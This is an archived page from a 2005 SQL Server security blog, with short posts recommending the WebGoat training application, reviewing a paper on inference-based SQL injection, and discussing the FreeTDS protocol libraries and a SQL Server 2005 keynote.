Pete Finnigan's SQL Server Security Blog

Cookie Policy:We only use essential cookies on small sections of this website. For details see here.


SQL Server Security
Blog Archives
Oracle Security
Oracle Security Blog

Greymatter Forums

October 2005
SMTWTFS
      1
2345678
9101112131415
16171819202122
23242526272829
3031     

RSS 1.0 FEED
RSS 2.0 FEED
Atom 0.3 FEED
Powered by gm-rss 2.0.0


Valid XHTML 1.0!

Powered By Greymatter

Monday, October 10th

WebGoat an excellent application for testing web security


Few people have open access to full blown web based business applications that they can use to practice all manner of web based attacks. The Open Web Application Security Project has created a full J2EE web application called WebGoat that is aimed at allowing people to practice various attack vectors whilst giving on line lessons on how to perform the attacks. The tool includes examples for Cross Site Scripting, SQL Injection, blind SQL, weak session identifiers and many more. This is a great tool for those wishing to learn about web application security.
Pete on 10.10.05 @ 10:42 PM GMT [link]


David Litchfield has a good paper on SQL Injection methods


David Litchfield has a good new paper out titled "Data-Mining With SQL Injection and Inference" which talks about the methods for extracting data from a database when its not possible to get the data back through the same channel as the original query or even via a separate channel such as email. The method David discusses includes examples for SQL Injecting SQL Server and is called inference. This method shows how data presence or value in the database might be inferred by altering the known output or by causing a web server error or even by injecting a time delay in the application. This is a very interesting paper and well worth reading.
Pete on 10.10.05 @ 10:26 PM GMT [link]


Thursday, October 6th

FreeTDS an implementation of SQL Server and Sybase TDS protocol libraries


I was searching for interesting SQL Server security stuff to look for an found out that the network protocol is called TDS (Tabular Data Stream) - well actually I knew that already. I wanted to know if there are any documents available that divulge the protocol and any free libraries. If they exist then its first possible to build your own client and second possible to send arbitrary commands to the SQL Server port, i.e. it could be hacked.

There is a great site called "FreeTDS - Making the leap to SQL Server". This details the API's available for Perl and php. There is also a link to a Java implementation and of course C libraries are available. Many different flavours of the protocol are supported. There is even versions for Unix so its possible to access data from SQL Server on Unix/Linux machines and even to port SQL Server code to Unix.

There is a FAQ, a user guide and a reference manual. I have not delved deeply into this yet but it certainly looks like a promising way to create a tool that can find and interrogate SQL Server, great for writing security tools and great for security research.
Pete on 10.06.05 @ 10:06 PM GMT [link]


Saturday, October 1st

Dave Campbell Keynote at SQL PASS


I came across Don Kiely's post to his blog called "Dave Campbell Keynote at SQL PASS" which talks about David Campbells keynote at SQL PASS which talks about moving to SQL Server 2005 and one of the key things he focussed on was trusted platform and security features. Don summarises the keynote and I noted the on-stage live demo of upgrading to 2005 and Don's comment about what security state will that leave the database in was quite good. The last paragraph is the mention of security features. 2005 includes a demo of using a smart card as an encryption key which can allow per user encryption of data. I am not convinced as to how useful that would be in real applications. How segregated would the data need to be so that each user could only encrypt/decrypt their own data? Don also goes on to talk about some of the issues with smart card key storage.
Pete on 10.01.05 @ 10:30 PM GMT [link]